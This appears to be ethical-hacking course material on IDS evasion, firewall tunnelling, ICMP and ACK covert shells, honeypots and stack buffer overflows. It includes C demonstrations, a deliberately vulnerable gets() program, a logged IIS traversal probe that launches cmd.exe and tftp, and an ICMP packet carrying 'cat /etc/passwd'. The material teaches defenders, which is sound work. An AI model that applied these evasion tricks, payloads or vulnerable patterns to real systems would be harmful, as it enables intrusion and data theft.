Sends attacks at the target that evades an IDS.
One of the following protocols/attacks must be specified:

-rpc    RPC PortMap DUMP
-ftp    FTP CD ~root
-dns    DNS version.bind query
-snmp   SNMP lanman user enum
-http   /cgi-bin/phf
-bo     BackOrifice ping
-all

One of three modes must be specified:
-norm   Does no evasion (normal attacks)
-evade  Attempts to attack target evading the IDS
-false  Does not attack the system at all (false positive)

Example:
sidestep 10.0.0.1 -evade -dns

Queries DNS server for version info evading IDS
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Hacking Tool: Anzen NIDSbench



http://www.anzen.com/research/nidsbench/

• Contains "fragrouter", which forces all traffic to fragment
and demonstrates how easy it is for hackers/crackers
to do the same in order to evade intrusion det: detection.

• This accepts incoming traffic then fragments it
according to various rules (IP fragmentation with
various sizes and overlaps, TCP segmentation again
with various sizes and overlaps, TCP insertion in order
to de-synchronize the connection, etc.).
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Hacking Tool: ADMutate



http://www.ktwo.ca/security.html

• ADMutate accepts a buffer overflow exploit as
input and randomly creates a functionally
equivalent version which bypasses IDS.

• Once a new attack is known, it usually takes the
IDS vendors a number of hours or days to
develop a signature. But in the case of
ADMutate, it has taken months for signature-based
IDS vendors to add a way to detect a
polymorphic buffer overflow generated by it.
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Tools to inject strangely formatted packets on to the wire



• Libnet (http://www.packetfactory.net/libnet)

• Rootshell (http://www.rootshell.com)

• IPsend (http://www.coombs.anu.edu.au/~avalon)

• Sun Packet Shell (psh) Protocol Testing Tool
(http://www.playground.sun.com/psh)

• Net::RawIP (http://www.quake.skif.net/RawIP)

• CyberCop Scanner's CASL (http://www.nai.com)
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What do I do when I have been hacked?



• Incident response team

Set up an "incident response team". Identify those people who
should be called whenever people suspect an intrusion in progress.

• Response procedure

You need to decide now what your priorities are between network
uptime and intrusion. Can you pull the network plug whenever you
strongly suspect an intrusion? Do you want to allow a continued
intrusion in order to gather evidence against the intruder?

• Lines of communication

Do you propagate the information up the corporate food chain,
from your boss up to the CEO? Do you inform the FBI or police? Do
you notify partners (vendors/customers)?
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Hacking through firewalls






• One of the easiest and most common ways for an
attacker to slip by a firewall is by installing some
network software on an internal system that
communicates using a port address permitted by the
firewall's configuration.

• A popular port to use is port 53 TCP, normally used by
DNS.

• Many firewalls permit all traffic using port 53 by
default because it simplifies firewall configuration and
reduces support calls.
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Bypassing Firewall using Httptunnel



• http://www.nocrew.org/software/httptunnel.html

• Httptunnel creates a bidirectional virtual data path
tunneled in HTTP requests. The requests can be sent via an
HTTP proxy if so desired.

[Screenshot: C:\WINDOWS\System32\cmd.exe]

Tunnel 3.3>htc --help

Usage: htc [OPTION]... HOST[:PORT]

Set up a httptunnel connection to PORT at HOST (default port is 8888).
When a connection is made, I/O is redirected from the source specified
by the --device, --forward-port or --stdin-stdout switch to the tunnel.

  --proxy-authorization USER:PASSWORD   proxy authorization
  --proxy-authorization-file FILE       proxy authorization file
  --proxy-buffer-size BYTES             assume a proxy buffer size of BYTES bytes
                                        (k, M, and G postfixes recognized)
  --content-length BYTES                use HTTP PUT requests of BYTES size
                                        (k, M, and G postfixes recognized)
  --device DEVICE                       use DEVICE for input and output
  --forward-port PORT                   use TCP port PORT for input and output
  --help                                display this help and exit
  --keep-alive SECONDS                  send keepalive bytes every SECONDS seconds
                                        (default is 5)
  --max-connection-age SEC              maximum time a connection will stay
                                        open is SEC seconds (default is 300)
  --proxy HOSTNAME[:PORT]               use a HTTP proxy (default port is 8080)
  --stdin-stdout                        use stdin/stdout for communication
                                        (implies --no-daemon)
  --strict-content-length               always write Content-Length bytes in requests
  --timeout TIME                        timeout, in milliseconds, before sending
                                        padding to a buffering proxy
  --user-agent STRING                   specify User-Agent value in HTTP requests
  --version                             output version information and exit
  --no-daemon                           don't fork into the background
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Placing Backdoors through Firewalls

The reverse www shell

• This backdoor should work through any firewall that allows users to surf the WWW. A program is run on the internal host which spawns a child every day at a special time.

• To the firewall, this child looks like a user surfing the internet with a Netscape client. In reality, the child executes a local shell and connects to the www server operated by the hacker on the internet via a legitimate-looking HTTP request, and sends it a ready signal.

• The legitimate-looking answers of the www server operated by the hacker are in reality the commands the child will execute on its machine in the local shell. Because the connection is always initiated from the inside, an inbound-only filter never sees anything to block; the tell-tale sign is the fixed daily check-in time and the outbound POSTs to a single unfamiliar host.
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Hiding Behind Covert Channel: Loki

http://www.phrack.com/phrack/51/P51-06

• LOKI 2 is an information-tunnelling program. LOKI uses Internet Control Message Protocol (ICMP) echo response packets to carry its payload. ICMP echo response packets are normally received by the ping program, and many firewalls permit responses to pass.

• From the Phrack article: "We tunnel simple shell commands inside of ICMP_ECHO / ICMP_ECHOREPLY and DNS name lookup query / reply traffic. To the network protocol analyzer, this traffic seems like ordinary benign packets of the corresponding protocol. To the correct listener (the LOKI 2 daemon) however, the packets are recognized for what they really are."
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Hacking Tool: 007 Shell

http://www.s0ftpj.org/en/docs.html

• 007Shell is a covert-shell ICMP tunnelling program. It works similarly to Loki.

• It works by putting data streams in the ICMP message past the 4-byte common ICMP header (8-bit type, 8-bit code and 16-bit checksum). For echo messages a 16-bit identifier and a 16-bit sequence number follow, so the tunnelled data begins at byte 8, exactly where ping puts its own padding.
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Hacking Tool: ICMPShell

• ICMP Shell (ISH) is a telnet-like protocol. It provides the capability of connecting to a remote host and opening a shell using only ICMP for input and output.

• The ISH server runs as a daemon on the server side. When the server receives a request from the client, it strips the header and looks at the ID field; if it matches the server's ID, it pipes the data to "/bin/sh".

• It then reads the results from the pipe and sends them back to the client, where the client prints the data to stdout.
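The three tools above share one mechanism: the bytes after the 8-byte ICMP echo header are "padding" to every router, firewall and packet analyser on the path, and only the daemon that knows the shared ID treats them as a command. The following is an added example, not code from Loki, 007Shell or ICMPShell, that builds and parses such a message in memory (no raw socket is opened) and includes the check a defender can run on captured pings. The shared ID value and the command string are constructed for the example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define ICMP_ECHOREPLY 0
#define ICMP_ECHO      8
#define ICMP_HDR_LEN   8        /* type, code, checksum, identifier, sequence */
#define SHARED_ID      0x1337   /* assumed shared ID, like the ISH daemon's ID check */

/* RFC 1071 Internet checksum over an ICMP message (big-endian 16-bit words). */
static uint16_t icmp_checksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    size_t i;
    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)buf[i] << 8) | buf[i + 1];
    if (len & 1)
        sum += (uint32_t)buf[len - 1] << 8;
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    return (uint16_t)~sum;
}

/* Client side: wrap a command in an echo (or echo reply) message. The bytes after
 * the 8-byte header look like ping padding to everyone except the daemon.
 * Returns the message length, or 0 if it does not fit. */
size_t build_covert_echo(uint8_t *out, size_t cap, uint8_t type, uint16_t id,
                         uint16_t seq, const char *cmd)
{
    size_t plen = strlen(cmd);
    if (ICMP_HDR_LEN + plen > cap) return 0;
    out[0] = type;                 out[1] = 0;             /* type, code */
    out[2] = 0;                    out[3] = 0;             /* checksum, filled below */
    out[4] = (uint8_t)(id >> 8);   out[5] = (uint8_t)id;
    out[6] = (uint8_t)(seq >> 8);  out[7] = (uint8_t)seq;
    memcpy(out + ICMP_HDR_LEN, cmd, plen);
    uint16_t ck = icmp_checksum(out, ICMP_HDR_LEN + plen);
    out[2] = (uint8_t)(ck >> 8);   out[3] = (uint8_t)ck;
    return ICMP_HDR_LEN + plen;
}

/* Daemon side: verify the checksum, strip the header, compare the ID field, and
 * only then treat the payload as a command. Returns the payload length, or -1
 * for anything that is just an ordinary ping. */
int extract_covert_payload(const uint8_t *pkt, size_t len, uint16_t id,
                           char *cmd, size_t cap)
{
    if (len < ICMP_HDR_LEN) return -1;
    if (pkt[0] != ICMP_ECHO && pkt[0] != ICMP_ECHOREPLY) return -1;
    if (icmp_checksum(pkt, len) != 0) return -1;   /* a valid message checksums to 0 */
    uint16_t pkt_id = (uint16_t)((pkt[4] << 8) | pkt[5]);
    if (pkt_id != id) return -1;
    size_t plen = len - ICMP_HDR_LEN;
    if (plen + 1 > cap) return -1;
    memcpy(cmd, pkt + ICMP_HDR_LEN, plen);
    cmd[plen] = '\0';
    return (int)plen;
}

/* Defender side: normal ping padding is a timestamp followed by a 0x10,0x11,0x12...
 * run; an echo whose payload is almost entirely printable ASCII deserves a look. */
int payload_looks_like_text(const uint8_t *pkt, size_t len)
{
    if (len <= ICMP_HDR_LEN) return 0;
    size_t printable = 0, total = len - ICMP_HDR_LEN;
    for (size_t i = ICMP_HDR_LEN; i < len; i++)
        if (pkt[i] >= 0x20 && pkt[i] < 0x7f) printable++;
    return printable * 10 >= total * 9;            /* 90% or more printable */
}

int main(void)
{
    uint8_t pkt[128];
    char cmd[64];
    size_t n = build_covert_echo(pkt, sizeof pkt, ICMP_ECHO, SHARED_ID, 1, "cat /etc/passwd");
    int got = extract_covert_payload(pkt, n, SHARED_ID, cmd, sizeof cmd);
    printf("daemon accepted %d payload bytes: %s\n", got, cmd);
    printf("wrong ID -> %d\n", extract_covert_payload(pkt, n, 0x4242, cmd, sizeof cmd));
    printf("printable payload flagged: %s\n", payload_looks_like_text(pkt, n) ? "yes" : "no");
    return 0;
}
```

The ID check is what keeps a real ping from being fed to /bin/sh, which is why both the daemon and the defender's signature key off it; the printable-payload heuristic is deliberately crude, since a tunnel that XORs or compresses its payload will defeat it, and blocking ICMP echo at the perimeter (as the next slide notes) is the robust answer.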
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ACK Tunneling

• Trojans normally use ordinary TCP or UDP communication between their client and server parts.

• Any firewall between the attacker and the victim that blocks incoming traffic will usually stop all such trojans from working. ICMP tunnelling has existed for quite some time now, but if you block ICMP in the firewall you are safe from that.

• ACK tunnelling works through firewalls that do not apply their rule sets to TCP ACK segments (ordinary stateless packet filters belong to this class of firewalls). Such a filter passes any segment with the ACK bit set on the assumption that it belongs to an already established connection, so it cannot tell a crafted ACK-only segment from a genuine reply. A stateful firewall, which only passes inbound segments matching a connection it saw opened, is not fooled.
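To make the distinction concrete, here is an added example (not code from AckCmd or any firewall product) that models the two filter types from the slide. The "established" rule of a stateless filter is reduced to a flag test, the stateful filter keeps a connection table fed by outbound SYNs, and a crafted ACK-only segment is run through both. Addresses and ports are constructed for the example.

```c
#include <stdint.h>
#include <string.h>

#define TH_SYN 0x02
#define TH_ACK 0x10

/* Only the fields a filter decides on; constructed for the example, not a wire header. */
struct segment {
    uint32_t src_ip, dst_ip;
    uint16_t src_port, dst_port;
    uint8_t  flags;
};

/* Stateless packet filter, as on the slide. Inbound rule: "allow if it is part of
 * an established connection", which a stateless filter can only approximate as
 * "ACK set, SYN clear". Any crafted ACK-only segment therefore passes. */
int stateless_allows_inbound(const struct segment *s)
{
    return (s->flags & TH_ACK) && !(s->flags & TH_SYN);
}

/* Stateful filter: remember connections opened from the inside (outbound SYN), and
 * pass inbound segments only if they belong to a remembered connection. */
#define MAX_CONN 64
struct conn { uint32_t in_ip, out_ip; uint16_t in_port, out_port; };
struct conn_table { struct conn c[MAX_CONN]; int n; };

void stateful_observe_outbound(struct conn_table *t, const struct segment *s)
{
    if ((s->flags & TH_SYN) && !(s->flags & TH_ACK) && t->n < MAX_CONN) {
        t->c[t->n].in_ip = s->src_ip;   t->c[t->n].in_port = s->src_port;
        t->c[t->n].out_ip = s->dst_ip;  t->c[t->n].out_port = s->dst_port;
        t->n++;
    }
}

int stateful_allows_inbound(const struct conn_table *t, const struct segment *s)
{
    if (!(s->flags & TH_ACK)) return 0;
    for (int i = 0; i < t->n; i++)
        if (t->c[i].in_ip == s->dst_ip && t->c[i].in_port == s->dst_port &&
            t->c[i].out_ip == s->src_ip && t->c[i].out_port == s->src_port)
            return 1;
    return 0;
}

/* Constructed addresses: 10.0.0.5 is the victim inside, 203.0.113.9 the attacker,
 * 198.51.100.20 a web server the victim legitimately talks to. */
#define VICTIM   0x0A000005u
#define ATTACKER 0xCB007109u
#define WEBSRV   0xC6336414u

/* Runs the three cases and packs the verdicts into bits:
 * bit0 = stateless passes the crafted ACK, bit1 = stateful passes the crafted ACK,
 * bit2 = stateful passes the genuine reply. Expected result: 0b101 = 5. */
int ack_tunnel_demo(void)
{
    struct conn_table t;
    memset(&t, 0, sizeof t);

    struct segment out_syn = { VICTIM, WEBSRV, 50000, 80, TH_SYN };
    stateful_observe_outbound(&t, &out_syn);

    struct segment reply   = { WEBSRV, VICTIM, 80, 50000, TH_SYN | TH_ACK };
    struct segment crafted = { ATTACKER, VICTIM, 40000, 1054, TH_ACK };  /* AckCmd-style */

    int v = 0;
    if (stateless_allows_inbound(&crafted))   v |= 1;
    if (stateful_allows_inbound(&t, &crafted)) v |= 2;
    if (stateful_allows_inbound(&t, &reply))   v |= 4;
    return v;
}
```

The stateless filter's answer does not depend on the destination port at all, which is exactly what the slide means by "not applying the rule set to ACK segments"; the stateful filter rejects the crafted segment not because of its flags but because no inside host ever opened a connection to the attacker.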
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Hacking Tool: AckCmd

http://ntsecurity.nu/papers/acktunneling

• AckCmd is a client/server combination for Windows 2000 that lets you open a remote command prompt to another system (running the server part of AckCmd).

• It communicates using only TCP ACK segments. This way the client component is able to directly contact the server component through the firewall in some cases.

Screenshot: the server (ackcmds) is started in one window and the client (ackcmdc) connects to it on the loopback address in another:

  C:\Documents and Settings\Owner\My Documents\Ethical Hacking Lab Files v2.3\Hacking\Module 19 - Hacking VPN, Routers and Firewalls\ackcmd>ackcmds

  C:\Documents and Settings\Owner\My Documents\Ethical Hacking Lab Files v2.3\Hacking\Module 19 - Hacking VPN, Routers and Firewalls\ackcmd>ackcmdc 127.0.0.1
  AckCmd 1.1 - The Ack Command Prompt for Windows 2000
  - (c) 2000, Arne Vidstrom, arne.vidstrom@ntsecurity.nu
  - For instructions see http://ntsecurity.nu/toolbox/ackcmd/

  Type "quit" and press Enter to quit

  AckCmd>
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Honeypots

• Honeypots are programs that simulate one or more network services that you designate on your computer's ports.

• An attacker assumes that you are running vulnerable services that can be used to break into the machine.

• A honeypot can be used to log access attempts to those ports, including the attacker's keystrokes.

• This could give advance warning of a more concerted attack. Because a honeypot has no production purpose, every connection to it is suspect by definition, which keeps its false-positive rate far below that of a network IDS.
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Honeypot Software Vendors

1. Back Officer Friendly (http://www.nfr.com)
2. Bait N Switch Honeypot (http://violating.us)
3. BigEye (http://violating.us)
4. HoneyD (http://www.citi.umich.edu/u/provos/honeyd/)
5. KFSensor for Windows (http://www.keyfocus.net/kfsensor/)
6. LaBrea Tarpit (http://www.hackbusters.net)
7. ManTrap (http://www.symantec.com)
8. NetFacade (http://www.itsecure.bbn.com/NetFacade.htm)
9. Single-Honeypot (http://www.sourceforge.net/projects/single-honeypot/)
10. Smoke Detector (http://palisadesys.com/products/smokedetector/)
11. Specter (http://www.specter.ch)
12. Tiny Honeypot (http://www.alpinista.org/thp/)
13. The Deception Toolkit (http://www.all.net/dtk/)
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Honeypot - KFSensor

Screenshot of the KFSensor console. The left pane shows the server state (Running / Stopped), a legend for ports (No recent activity, Recent Activity, Very Recent Activity, Inactive, Error), visitors (No recent activity, Activity, Very Recent Activity) and events (Normal Event, Alert, High Alert). An Event Details dialog shows one logged connection:

  Event ID: 418                  Type: Connection
  Start time: 17/12/2002 18:45:36.623
  End time:   17/12/2002 18:45:36.623
  Visitor IP: 217.39.205.180     Port: 4779
  Visitor domain: host217-39-205-180.in-addr.btopenworld.com
  Sensor IP: 217.39.97.38        Port: 80   Protocol: TCP
  Sim Server: httpApache         Action: SimBanner
  Closed by: Server              Limit exceeded: (none)

  Received:
    GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%2...
    Host: www
    Connnection: close

  Response:
    HTTP/1.1 200 OK
    Date: Tue, 17 Dec 2002 18:45:36 GMT
    Server: Apache/2.0.39 (Win32)
    Connection: close

What the honeypot caught is an automated probe for the IIS double-decode directory traversal: "%%35%63" decodes to "%5c" on a first pass and to "\" on a second, turning the path into "/scripts/..\../winnt/system32/cmd.exe", and the query string tries to run tftp to fetch a file. The simulated Apache banner answered it with 200 OK and logged the whole request; the misspelt "Connnection" header is part of the probe as sent, not a transcription error. (The request line is truncated in the screenshot.)
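A detector that only decodes a URL once would miss the request logged above, because after one pass the path still looks as if it stays inside /scripts. The following is an added example, not KFSensor's or IIS's code, showing why: it decodes the logged path one pass at a time, normalises "." and ".." segments on both "/" and "\" the way the target did, and reports on which pass the path first escapes the virtual root. The request path is taken from the screenshot, cut at the query string since the line is truncated there.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* One pass of %xx decoding; malformed escapes (like the leading "%%") are copied
 * through untouched. Returns the decoded length. */
size_t url_decode_once(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; in[i] && o + 1 < cap; i++) {
        int h, l;
        if (in[i] == '%' && (h = hexval(in[i + 1])) >= 0 && (l = hexval(in[i + 2])) >= 0) {
            out[o++] = (char)(h * 16 + l);
            i += 2;
        } else {
            out[o++] = in[i];
        }
    }
    out[o] = '\0';
    return o;
}

/* Walk the path segment by segment, treating both '/' and '\' as separators, and
 * report 1 if a ".." ever climbs above the root of the path. */
int escapes_root(const char *path)
{
    int depth = 0;
    const char *p = path;
    while (*p) {
        while (*p == '/' || *p == '\\') p++;
        if (!*p) break;
        const char *seg = p;
        while (*p && *p != '/' && *p != '\\') p++;
        size_t n = (size_t)(p - seg);
        if (n == 2 && seg[0] == '.' && seg[1] == '.') {
            if (--depth < 0) return 1;
        } else if (!(n == 1 && seg[0] == '.')) {
            depth++;
        }
    }
    return 0;
}

/* Decode up to `passes` times and return the pass (1-based) on which the path
 * first escapes its root, or 0 if it never does within that many passes. */
int traversal_pass(const char *path, int passes)
{
    char cur[512], next[512];
    snprintf(cur, sizeof cur, "%s", path);
    for (int p = 1; p <= passes; p++) {
        url_decode_once(cur, next, sizeof next);
        if (escapes_root(next)) return p;
        if (strcmp(cur, next) == 0) break;        /* nothing left to decode */
        memcpy(cur, next, sizeof cur);
    }
    return 0;
}

/* Path from the honeypot log, cut at the truncated query string. */
static const char *LOGGED_PATH = "/scripts/..%%35%63../winnt/system32/cmd.exe";

int main(void)
{
    printf("single-decode detector flags on pass: %d\n", traversal_pass(LOGGED_PATH, 1));
    printf("double-decode detector flags on pass: %d\n", traversal_pass(LOGGED_PATH, 2));
    return 0;
}
```

After one pass the second segment is the literal string "..%5c..", which a normaliser treats as an ordinary directory name, so the path appears to stay under /scripts; only the second decode turns "%5c" into a separator and exposes the two ".." segments. The general rule the example illustrates is that a filter has to canonicalise input exactly as the component behind it will, or it is checking a different string than the one that gets executed.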
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Summary

• Intrusion Detection Systems (IDS) monitor packets on the network wire and attempt to discover whether an attacker is trying to break into a system.

• System Integrity Verifiers (SIV) monitor system files to find when an intruder changes them. Tripwire is one of the popular SIVs.

• Intrusion detection happens either by anomaly detection or by signature recognition.

• An IDS consists of a special TCP/IP stack that reassembles IP datagrams and TCP streams.

• A simple protocol verification system can flag invalid packets. This can include valid but suspicious behaviour, such as severely fragmented IP packets.

• In order to effectively detect intrusions that use invalid protocol behaviour, an IDS must re-implement a wide variety of application-layer protocols to detect suspicious or invalid behaviour.

• One of the easiest and most common ways for an attacker to slip by a firewall is by installing network software on an internal system that uses a port permitted by the firewall's configuration.

• Honeypots are programs that simulate one or more network services that you designate on your computer's ports.
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Ethical Hacking

Module XX
Buffer Overflows

Module Objective

• What is a Buffer Overflow?
• Exploitation
• How to detect Buffer Overflows in a program?
• Skills required
• CPU / OS Dependency
• Understanding Stacks
• Stack Based Buffer Overflows
• Technical details
• Writing your own exploits
• Defense against Buffer Overflows
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On Oct 19, 2000, hundreds of flights were grounded or delayed because of a software problem in the Los Angeles air traffic control system. The cause was attributed to a Mexican controller typing 9 (instead of 5) characters of flight-description data, resulting in a buffer overflow.

Buffer Overflows

• A buffer overrun is when a program allocates a block of memory of a certain length and then tries to stuff too much data into the buffer, with the extra data overflowing and overwriting possibly critical information crucial to the normal execution of the program. Consider the following source code:

• When the source is compiled and turned into a program and the program is run, it will assign a block of memory 31 bytes long to hold the name string (30 characters plus the terminating NUL). gets() is never told that size; it keeps writing past the end of name for as long as input arrives, which is why the function was removed from the C standard in C11.

  /* Deliberately vulnerable: gets() performs no bounds check. */
  #include <stdio.h>

  int main(void)
  {
      char name[31];

      printf("Please type your name: ");
      gets(name);
      printf("Hello, %s", name);
      return 0;
  }

A buffer overflow will occur if you enter, for example, these 64 characters:

  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
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Exploitation

• Buffer overflow attacks depend on two things: the lack of boundary testing and a machine that can execute code that resides in the data/stack segment.

• The lack of boundary checking is very common, and usually the program simply ends with a segmentation fault or bus error. In order to exploit a buffer overflow to gain access or escalate privileges, the offender must craft the data to be fed to the application.

• Random data will generate a segmentation fault or bus error, never a remote shell or the execution of a command.
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Stack based Buffer Overflow

• The buffer is expecting a maximum number of guests, x.

• Send the buffer more than x guests.

• If the system does not perform boundary checks, the extra guests continue to be placed at positions beyond the legitimate locations within the buffer. (Java does not permit you to run off the end of an array or string, as C and C++ do.)

• Malicious code can be pushed onto the stack.

• The overflow can overwrite the return pointer so that the flow of control switches to the malicious code.
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Knowledge required to Program Buffer Overflow Exploits

1. C functions and the stack
2. A little knowledge of assembly/machine language
3. How system calls are made (at the machine code level)
4. exec() system calls
5. How to 'guess' some key parameters
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Understanding Stacks

• The stack is a LIFO (last in, first out) mechanism that computers use both to pass arguments to functions and to reference local variables.

• It acts like a buffer, holding all of the information that the function needs.

• A function's stack frame is created at the beginning of the function and released at the end of it.
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Stack layout of one function's frame (diagram):

  Bottom of Memory (low addresses)
    Buffer 2 (Local Variable 2)
    Buffer 1 (Local Variable 1)
    Return Pointer
    Function Call Arguments
  Top of Memory (high addresses)

Local buffers sit below the return pointer, so a buffer that is filled upward past its end reaches the return pointer (on x86 the saved frame pointer lies in between).
Understanding Assembly Language

The two most important operations on a stack:

• 1. Push - put one item on the top of the stack

• 2. Pop - "remove" one item from the top of the stack

  • typically returns the contents pointed to by a pointer and changes the pointer (not the memory contents)

• EIP: the extended instruction pointer. This points to the code that you are currently executing. When you call a function, this gets saved on the stack for later use.

• ESP: the extended stack pointer. This points to the current position on the stack and allows things to be added to and removed from the stack using push and pop operations or direct stack pointer manipulation.

• EBP: the extended base pointer. This register should stay the same throughout the lifetime of the function. It serves as a fixed point for referencing stack-based information like variables and data in a function using offsets. This almost always points to the top of the stack for a function.
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A Normal Stack (diagram)

  (higher addresses)
  EIP (saved return address)
  saved registers
  local variables
  -------------------------------  caller's frame ends here
  args
  saved registers
  local variables                  <- esp
  -------------------------------  current stack frame
  (lower addresses)
How to detect Buffer Overflows in a program

There are two ways to detect buffer overflows.

• The first one is looking at the source code. In this case, the hacker can look for strings declared as local variables in functions or methods and verify the presence of boundary checks. It is also necessary to check for improper use of standard functions, especially those related to strings and input/output (gets, strcpy, strcat, sprintf, scanf with %s).

• The second way is by feeding the application huge amounts of data and checking for abnormal behaviour (fuzzing); a crash on a long input is the usual first symptom.
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Attacking a real Program

• Assuming that a string function is being exploited, the attacker can send a long string as the input.

• This string overflows the buffer and causes a segmentation error.

• The return pointer of the function is overwritten and the attacker succeeds in altering the flow of execution.

• If he has to insert his code in the input, he has to:

  • Know the exact address on the stack
  • Know the size of the stack
  • Make the return pointer point to his code for execution
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NOPs

• Most CPUs have a No Operation instruction; it does nothing but advance the instruction pointer.

• Usually we can put some of these ahead of our program (in the string).

• As long as the new return address points to a NOP we are OK.

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The attacker pads the beginning of the intended buffer overflow with a long run of NOP instructions (a NOP slide or sled) so the CPU will do nothing until it gets to the 'main event' (which precedes the 'return pointer'). The sled relaxes the need to know the exact stack address: any guess that lands inside the sled reaches the payload.

Most intrusion detection systems (IDS) look for signatures of NOP sleds. ADMutate (by K2) accepts a buffer overflow exploit as input and randomly creates a functionally equivalent version (polymorphism).

How to mutate a Buffer Overflow Exploit

For the NOP portion:
  Randomly replace the NOPs with functionally equivalent segments of code (e.g. x++; x--; in place of NOP NOP).

For the "main event":
  Apply XOR to combine the code with a random key so that it is unintelligible to the IDS. The CPU must also decode the gibberish in time to run it, so a small decoder is prepended; the decoder is itself polymorphic, so it is hard to spot.

For the "return pointer":
  Randomly tweak the LSB of the pointer so that it still lands in the NOP zone.
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Once the stack is smashed...

Once the vulnerable process is commandeered, the attacker has the same privileges as the process. If that only yields normal user access, the attacker can then exploit a local buffer overflow vulnerability to gain super-user access.

Create a backdoor:

  Using (UNIX-specific) inetd

  Using Trivial FTP (TFTP), included with Windows 2000 and some UNIX flavours

  Use Netcat to make a raw, interactive connection

  Shoot back an X terminal connection (UNIX-specific GUI)

Defense against Buffer Overflows

• Manual auditing of code

• Disabling stack execution

• Safer C library support

• Compiler techniques
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StackGuard

• StackGuard: Protects Systems From Stack Smashing Attacks

• StackGuard is a compiler approach for defending programs and systems against "stack smashing" attacks: the compiler places a "canary" word on the stack between the local buffers and the return pointer and verifies it before the function returns.

• Programs that have been compiled with StackGuard are largely immune to stack smashing attacks, because an overflow that reaches the return pointer must first overwrite the canary.

• Protection requires no source code changes at all. When a vulnerability is exploited, StackGuard detects the attack in progress, raises an intrusion alert, and halts the victim program.

http://www.cse.ogi.edu/DISC/projects/immunix/StackGuard/
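The slides above describe the overflow (the gets() program, the stack-based overflow, "Attacking a real Program") and the defence (StackGuard) separately. The following added example, which is not code from the course or from StackGuard, puts them in one place: it models the frame drawn in the stack-layout slide as a struct so that every write stays inside one C object, then shows the unbounded copy overwriting the return pointer, the bounded copy leaving it alone, and a StackGuard-style canary catching the overwrite. The addresses and canary value are constructed for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RET_OK 0x08048500u   /* constructed: the legitimate return address */
#define CANARY 0x000aff0du   /* constructed StackGuard-style terminator canary */

/* One stack frame, laid out as in the slide's picture, lowest address first.
 * On a real stack the same fields sit in the same order. */
struct frame {
    char     buffer[16];      /* local variable filled from attacker input */
    uint32_t canary;          /* only checked by the StackGuard variant */
    uint32_t saved_ebp;
    uint32_t return_pointer;  /* what 'ret' will jump to */
};

static void init_frame(struct frame *f)
{
    memset(f->buffer, 0, sizeof f->buffer);
    f->canary = CANARY;
    f->saved_ebp = 0xbffff4c0u;    /* constructed */
    f->return_pointer = RET_OK;
}

/* Vulnerable pattern (strcpy/gets with no bound): the input is copied for its full
 * length starting at buffer[0], so it runs on into canary, saved_ebp and the
 * return pointer. Returns the return pointer the CPU would use afterwards. */
uint32_t unbounded_copy_ret(const uint8_t *input, size_t len)
{
    struct frame f;
    init_frame(&f);
    if (len > sizeof f) len = sizeof f;
    memcpy((uint8_t *)&f, input, len);
    return f.return_pointer;
}

/* Fixed pattern: never copy more than the buffer holds, and terminate it. */
uint32_t bounded_copy_ret(const uint8_t *input, size_t len)
{
    struct frame f;
    init_frame(&f);
    size_t n = len < sizeof f.buffer - 1 ? len : sizeof f.buffer - 1;
    memcpy(f.buffer, input, n);
    f.buffer[n] = '\0';
    return f.return_pointer;
}

/* StackGuard: a canary below the return pointer is checked before 'ret'.
 * Returns 1 if the frame is intact, 0 if the overwrite was detected (the
 * program would be halted instead of returning into attacker data). */
int canary_intact_after_copy(const uint8_t *input, size_t len)
{
    struct frame f;
    init_frame(&f);
    if (len > sizeof f) len = sizeof f;
    memcpy((uint8_t *)&f, input, len);
    return f.canary == CANARY;
}

/* The attacker's input: filler over buffer, canary and saved_ebp, then the new
 * return address in host byte order (little-endian on x86). Returns its length. */
size_t build_attack_input(uint8_t *out, uint32_t new_ret)
{
    size_t off = offsetof(struct frame, return_pointer);
    memset(out, 'A', off);
    memcpy(out + off, &new_ret, sizeof new_ret);
    return off + sizeof new_ret;
}

int main(void)
{
    uint8_t evil[sizeof(struct frame)];
    size_t n = build_attack_input(evil, 0xdeadbeefu);
    printf("unbounded copy: ret = 0x%08x\n", unbounded_copy_ret(evil, n));
    printf("bounded copy:   ret = 0x%08x\n", bounded_copy_ret(evil, n));
    printf("canary intact after attack: %d\n", canary_intact_after_copy(evil, n));
    return 0;
}
```

The canary value contains a NUL, CR and LF on purpose: an attacker who must get the bytes through gets() or strcpy() cannot reproduce it, since those functions stop at exactly those characters, which is what a "terminator canary" relies on. The bounded copy is the code-level fix; the canary is the compiler-level safety net for the copies nobody audited.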
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Immunix System

• Immunix System 7 is an Immunix-enabled RedHat Linux 7.0 distribution and suite of application-level security tools.

• Immunix secures a Linux OS and its applications.

• Immunix works by hardening existing software components and platforms so that attempts to exploit security vulnerabilities fail safe, i.e. the compromised process halts instead of giving control to the attacker, and is then restarted.

http://immunix.org
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Vulnerability Search - ICAT

Screenshot of the ICAT metabase search form (the ICAT team credits CERIAS, FedCIRC and ISS X-Force among the organisations supporting it).

Search tips:
  All drop-down menus are ANDed together to create a query.
  Click a link below to look up vulnerabilities by vendor or product name (A..B, C..E, F..H, I..K, L..N, O..Q, R..T, U..W, X..Z, All).
  "_" represents non-alphabetic characters.
  Double quotes are ignored in text search; individual words are ANDed together.

Form fields as shown: Vendor / Product / Version (Any); Keyword search (try a CVE or CAN name); Severity (Any); General filters: Common sources, Related exploit range (Remote), Vulnerability consequence (Any), Vulnerability type (buffer overflow); Entry type (CVE entries); Entries since the following date (Any Month, 2003); buttons for All entries, 1 Year, 6 Months, 3 Months and Reset values.
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Summary

• A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold.

• Buffer overflow attacks depend on two things: the lack of boundary testing and a machine that can execute code that resides in the data/stack segment.

• Buffer overflow vulnerabilities can be detected by skilled auditing of the code as well as by boundary testing.

• Once the stack is smashed, the attacker can deploy his payload and take control of the attacked system.

